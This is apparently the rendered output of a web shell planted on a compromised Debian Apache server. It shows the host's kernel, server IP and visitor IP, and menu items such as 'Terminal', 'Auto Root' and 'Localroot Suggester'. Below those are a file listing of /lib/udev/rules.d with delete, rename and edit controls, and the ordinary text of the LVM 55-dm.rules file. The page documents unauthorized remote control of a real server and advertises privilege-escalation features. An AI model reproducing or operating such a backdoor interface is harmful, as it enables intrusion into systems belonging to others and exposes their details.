Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.35
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
udev /
rules.d /
Delete
Unzip
Name
Size
Permission
Date
Action
50-firmware.rules
210
B
-rw-r--r--
2021-07-07 14:21
50-udev-default.rules
3.23
KB
-rw-r--r--
2022-06-29 14:41
55-dm.rules
6.76
KB
-rw-r--r--
2017-03-17 17:29
60-block.rules
612
B
-rw-r--r--
2022-06-29 14:41
60-cdrom_id.rules
917
B
-rw-r--r--
2022-06-29 14:41
60-drm.rules
153
B
-rw-r--r--
2022-06-29 14:41
60-evdev.rules
738
B
-rw-r--r--
2022-06-29 14:41
60-persistent-alsa.rules
616
B
-rw-r--r--
2022-06-29 14:41
60-persistent-input.rules
2.56
KB
-rw-r--r--
2022-06-29 14:41
60-persistent-storage-dm.rules
1.46
KB
-rw-r--r--
2017-03-17 17:29
60-persistent-storage-tape.rules
1.47
KB
-rw-r--r--
2022-06-29 14:41
60-persistent-storage.rules
5.8
KB
-rw-r--r--
2022-06-29 14:41
60-persistent-v4l.rules
769
B
-rw-r--r--
2022-06-29 14:41
60-serial.rules
1.16
KB
-rw-r--r--
2022-06-29 14:41
63-md-raid-arrays.rules
2.08
KB
-rw-r--r--
2016-07-28 17:52
64-btrfs.rules
418
B
-rw-r--r--
2022-06-29 14:41
64-md-raid-assembly.rules
1.33
KB
-rw-r--r--
2016-07-28 17:52
70-debian-uaccess.rules
955
B
-rw-r--r--
2021-07-07 14:21
70-mouse.rules
734
B
-rw-r--r--
2022-06-29 14:41
70-power-switch.rules
942
B
-rw-r--r--
2022-06-29 14:41
70-touchpad.rules
473
B
-rw-r--r--
2022-06-29 14:41
70-uaccess.rules
2.63
KB
-rw-r--r--
2022-06-29 14:41
71-seat.rules
2.65
KB
-rw-r--r--
2022-06-29 14:41
73-seat-late.rules
596
B
-rw-r--r--
2022-06-29 14:41
73-special-net-names.rules
961
B
-rw-r--r--
2021-07-07 14:21
73-usb-net-by-mac.rules
692
B
-rw-r--r--
2021-07-07 14:21
75-net-description.rules
452
B
-rw-r--r--
2022-06-29 14:41
75-probe_mtd.rules
174
B
-rw-r--r--
2022-06-29 14:41
78-sound-card.rules
4.4
KB
-rw-r--r--
2022-06-29 14:41
80-debian-compat.rules
1.34
KB
-rw-r--r--
2021-07-07 14:21
80-drivers.rules
618
B
-rw-r--r--
2022-06-29 14:41
80-ifupdown.rules
190
B
-rw-r--r--
2016-04-20 14:57
80-net-setup-link.rules
292
B
-rw-r--r--
2022-06-29 14:41
85-hwclock.rules
204
B
-rw-r--r--
2018-03-07 19:29
99-systemd.rules
4.17
KB
-rw-r--r--
2022-06-29 14:41
Save
Rename
# Copyright (C) 2009 Red Hat, Inc. All rights reserved. # # This file is part of LVM2. # Udev rules for device-mapper devices. # # These rules create symlinks in /dev/disk directory. # Symlinks that depend on probing filesystem type, # label and uuid are created only if the device is not # suspended. # "add" event is processed on coldplug only! ACTION!="add|change", GOTO="dm_end" ENV{DM_UDEV_RULES}!="?*", GOTO="dm_end" ENV{DM_UDEV_DISABLE_DISK_RULES_FLAG}=="1", GOTO="dm_end" SYMLINK+="disk/by-id/dm-name-$env{DM_NAME}" ENV{DM_UUID}=="?*", SYMLINK+="disk/by-id/dm-uuid-$env{DM_UUID}" ENV{DM_SUSPENDED}=="1", GOTO="dm_end" ENV{DM_NOSCAN}=="1", GOTO="dm_watch" IMPORT{builtin}="blkid" ENV{DM_UDEV_LOW_PRIORITY_FLAG}=="1", OPTIONS="link_priority=-100" ENV{ID_FS_USAGE}=="filesystem|other|crypto", ENV{ID_FS_UUID_ENC}=="?*", SYMLINK+="disk/by-uuid/$env{ID_FS_UUID_ENC}" ENV{ID_FS_USAGE}=="filesystem|other", ENV{ID_FS_LABEL_ENC}=="?*", SYMLINK+="disk/by-label/$env{ID_FS_LABEL_ENC}" # Add inotify watch to track changes on this device. # Using the watch rule is not optimal - it generates a lot of spurious # and useless events whenever the device opened for read-write is closed. # The best would be to generete the event directly in the tool changing # relevant information so only relevant events will be processed # (like creating a filesystem, changing filesystem label etc.). # # But let's use this until we have something better... LABEL="dm_watch" OPTIONS+="watch" LABEL="dm_end"